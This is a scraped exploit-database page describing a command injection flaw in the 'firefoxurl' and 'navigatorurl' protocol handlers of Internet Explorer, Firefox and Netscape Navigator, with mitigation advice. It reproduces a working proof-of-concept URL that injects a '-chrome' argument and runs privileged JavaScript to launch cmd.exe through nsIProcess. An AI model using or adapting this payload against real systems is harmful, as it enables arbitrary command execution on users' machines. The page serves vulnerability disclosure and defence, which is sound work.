Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Command Injection Vulnerability in Web Browsers - exploit.company
header-logo
Suggest Exploit
vendor:
Internet Explorer, Firefox, Netscape Navigator
by:
7.5
CVSS
HIGH
Command Injection
78
CWE
Product Name: Internet Explorer, Firefox, Netscape Navigator
Affected Version From: Microsoft Internet Explorer, Mozilla Firefox, Netscape Navigator
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux, Mac

Command Injection Vulnerability in Web Browsers

Attackers can inject commands through the 'firefoxurl' and 'navigatorurl' protocol handlers in Microsoft Internet Explorer, Mozilla Firefox, and Netscape Navigator. This allows remote attackers to execute arbitrary commands and gain unauthorized access. They can also perform cross-browser scripting attacks by using the '-chrome' argument and run JavaScript code with the privileges of trusted Chrome context.

Mitigation:

Update the affected browsers to the latest version. Disable the 'firefoxurl' and 'navigatorurl' protocol handlers if not required. Regularly patch and update the browsers to address security vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24837/info

Microsoft Internet Explorer, Mozilla Firefox and Netscape Navigator are prone to a vulnerability that lets attackers inject commands through the 'firefoxurl' and 'navigatorurl' protocol handlers.

Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through the 'firefox.exe' and 'navigator.exe' processes by employing the 'firefoxurl' and 'navigatorurl' handlers.

An attacker can also employ these issues to carry out cross-browser scripting attacks by using the '-chrome' argument. This can allow the attacker to run JavaScript code with the privileges of trusted Chrome context and gain full access to Firefox and Netscape Navigator's resources.

Exploiting these issues would permit remote attackers to influence command options that can be called through the 'firefoxurl' and 'navigatorurl' handlers and therefore execute commands and script code with the privileges of a user running the applications. Successful attacks may result in a variety of consequences, including remote unauthorized access. 

navigatorurl:test"%20-chrome%20"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)

Navigation

Suggest Exploit

Services By CQR